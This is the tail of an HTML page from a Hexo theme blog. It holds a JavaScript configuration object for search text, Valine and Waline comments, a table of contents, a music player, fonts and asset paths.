                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Comment : {
            switch : true,
            type   : "Valine",
        },

        Waline : {
            el              : ".comments-content",
            serverURL       : "",
            path            : window.location.pathname,
            meta            : "['nick', 'mail', 'link']",
            requiredMeta    : "['nick', 'mail']",
            pageSize        : 10,
            lang            : "zh-cn",
            locale: {
                admin       : "博主",
                anonymous   : "匿名用户",
                sofa        : "快来做第一个评论的人吧 ~",
                placeholder : "希望大佬们不吝赐教！",
            },
            dark            : "html[color-scheme='dark']",
            search          : false,
            pageview        : true,
            comment         : true,
            copyright       : false,
        },

        Valine : {
            el             : ".comments-content",
            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "希望大佬们不吝赐教！",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            api      : "https://api.i-meto.com/meting/api",
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css",
            waline           : "/css/waline.css",
            walineCustom     : "/css/waline-custom.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js",
            waline           : "/js/waline.mjs",
            pageview         : "/js/pageview.mjs",
            comment          : "/js/comment.mjs",
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "It takes a strong man to save himself, and a great man to save another."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>